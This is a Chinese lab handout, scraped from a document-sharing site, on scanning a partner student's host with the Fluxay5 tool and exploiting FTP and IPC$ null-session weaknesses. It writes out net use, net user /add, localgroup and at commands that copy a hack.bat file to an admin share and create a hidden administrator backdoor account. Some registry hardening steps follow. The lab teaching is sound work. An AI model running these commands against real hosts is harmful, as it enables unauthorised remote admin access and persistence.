- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
使用流光Fluxay5综合工具并分析结果
任务二:使用流光Fluxay5综合扫描工具并分析结果
?
各部份功能:
1: 暴力破解的设置区域
2:控制台输出
3:扫描出来的典型漏洞列表
4:扫描或者暴力破解成功的用户帐号
5:扫描和暴力破解的速度控制
6:扫描和暴力破解时的状态显示
7:中止按钮
8:探测记录查找
?
?选择“文件(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。
?
?
?
?
?
扫描结束后,流光会自动打开HTML格式的扫描报告,而且还把可利用的主机列在流光界面的最下方,如图1所示。
?
?图1
单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。
?
?
图2
除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描工具设置:
分组角色:学生A、学生B互相扫描对方主机。
实验步骤:
(1)开放FTP服务,允许匿名连接。
(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。
(3)仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。
(4)根据扫描结果分析FTP漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文件。
(5)根据扫描结果分析IPC$漏洞:
IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。
IPC$相关命令:
1.建立和目标的ipc$连接命令:net use \\目标IP\ipc$ “密码”/user:“ADMIN”(管理员账号),如:net use \\28\ipc$“”/user:administrator2.映射网络驱动器命令(将目标主机的盘映射到本地磁盘):net use 本地盘符\\目标IP\盘符$,如:net use z:\\28\c$ 3.和目标建立了ipc$后,则可直接用IP加盘符加$访问。比如:copy 文件名\\IP\盘符$\路径\文件名,如:
copy hack.bat\\28\c$
也可直接对映射为本地磁盘的网络驱动器操作。4.管理计算机上面的账号命令:net user..查看账号命令:net user..建立账号命令:net user name passwd/add(net user sysbak123456 /add :添加用户名为sysback,密码为123456的账号)..删除账号命令:net user name /delete
5.管理工作组命令:net localgroup组名用户名/add[delete]..如:net localgroupadministrators sysback/add。该命令表示把sysback用户添加到管理员组(administrators)。6.查看目标计算机的系统时间:net time \\ip7.在远程主机上建立计划任务:at \\IP TIME COMMAND ..at \\28 13:45 c:\hack.bat(该命令表示在下午13点45分执行目标主机C盘中的hack.bat文件,时间一定要晚于当前远程主机系统时间)8.删除和目标的ipc$连接命令:net use \\IP\ipc$ /del9.断开所有IPC$连接:net use * /del10.禁止建立空连接:运行regedit,找到主键[HKEY_LOCAL_MACHINE \SYSTEM \CurrentControlSet\Control \LSA] ,把RestrictAnonymous(DWORD)的键值改为11.禁止自动打开默认共享:找到主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AutoShareServer(DWORD)的键值改为如果不存在,就新建一个再改键值。
利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:
1.编写批处理文件hack.bat,文件中包含两个命令:
1)建立一个新账号,
2)将新账号加入administrators组。2.使用net命令与目标主机建立连接3.将批处理文件hack.back拷贝至目标主机上。4.通过计划任务使目标主机执行hack.bat文件。5.断开所有IPC$连接。6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。7.删除和
您可能关注的文档
- 面试官问题还是自己的问题.doc
- 塑化剂的危害.doc
- 塑料包装袋检验标准.doc
- 面试常见问题汇总.doc
- 体育专业知识选择题1.doc
- 实验二减小仪表测量误差的方法(精选).doc
- 面试常遇到的问题问题.doc
- 塑料原材料检验通用标准_A版.doc
- 实验二刚性转子动平衡测试与分析(精选).doc
- 体育保健学实验课程标准.doc
- 浙江省温州市浙南名校联盟2025-2026学年高一上学期期中联考数学试题含解析.docx
- 26高考数学提分秘诀重难点34圆锥曲线中的定点、定值、定直线问题(举一反三专项训练)(全国通用)(含解析).docx
- 26高考数学提分秘诀重难点35概率与统计的综合问题(举一反三专项训练)(全国通用)(含解析).docx
- 26高考数学提分秘诀重难点31圆锥曲线中的切线与切点弦问题(举一反三专项训练)(全国通用)(含解析).docx
- 26高考数学提分秘诀重难点30圆锥曲线中的弦长问题与长度和、差、商、积问题(举一反三专项训练)(全国通用)(含解析).docx
- 26高考数学提分秘诀重难点29巧解圆锥曲线的离心率问题(举一反三专项训练)(全国通用)(含解析).docx
- 26高考数学提分秘诀重难点28直线与圆的综合(举一反三专项训练)(全国通用)(含解析).docx
- 寡核苷酸药物重复给药毒性研究技术指南.docx
- 重组溶瘤腺病毒生产质量管理标准.docx
- 26高考数学提分秘诀重难点27直线与圆中常考的最值与范围问题(举一反三专项训练)(全国通用)(含解析).docx
最近下载
- JVC摄像机DLA-N700BC用户手册.pdf
- 一次性使用医疗物品管理.pptx VIP
- 五轴往复喷漆机系统手册.pdf VIP
- 《最好的宝藏》幼儿园大班语言PPT课件.pptx VIP
- 隧道施工安全控制及检查要点讲义.pptx VIP
- 2024-2025学年晋教版初中地理八年级下册(全册)教学设计(附教材目录P111).docx
- “沪上生态家”项目绿色建筑集成设计与建造后评估报告2012.pdf VIP
- 2025年安徽公共资源交易集团人员招聘笔试备考题库及答案解析.docx VIP
- 新时达AS330扶梯一体机电气原理图纸ESHC_500_V2.0.pdf
- 2025年供热基础设施项目监理细则.docx VIP
原创力文档


文档评论(0)